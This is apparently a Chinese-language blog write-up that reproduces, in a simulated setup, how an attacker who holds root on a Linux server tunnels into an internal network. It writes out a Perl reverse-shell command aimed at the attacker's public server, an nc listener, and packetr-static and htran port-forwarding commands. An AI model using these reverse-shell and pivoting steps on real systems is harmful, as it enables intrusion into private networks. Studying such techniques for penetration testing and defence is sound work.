遇到一個案例,細節不表,把在案例中的操作方法在本機模拟了下,記錄之.
環境:
被攻陷的Linux主機(拿到root權限)-----模拟為我内網的一台Linux伺服器 192.168.0.105
hack的操作用機-----我的電腦 192.168.1.101
反彈到公網的伺服器-----我自己的公網伺服器 61.160.2xx.xxx
滲透測試用的windows測試機 192.168.1.109
工具:
packetr-static Linux下的
htran.exe windows下的
sockcap 用作代理進入内網滲透的利器
過程:
1.我模拟下極度苛刻的情況下的環境,該攻陷的Linux伺服器對外不開放22,隻存在web端口80,那麼我們必須得反彈shell到公網的機器上,這點我虛拟機裡面沒 這個環境,我就直接說下簡要的
上傳back.pl檔案到linux下的tmp目錄下,執行
perl /tmp/back.pl xxx.xxx.xxx.xxx 端口
在公網的伺服器上,運作nc執行
nc -l -v -p 端口(跟上面的一樣)
現在我彈2個視窗回來,一個開代理,一個轉發資料
把packetr-static傳上去,執行
./packetr-static -s 1988
一個視窗轉發資料,執行
./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988
2.在windows公網端執行,
htran.exe -p -listen 123 1988
3.配置sockcap
4.運作代理程式進入内網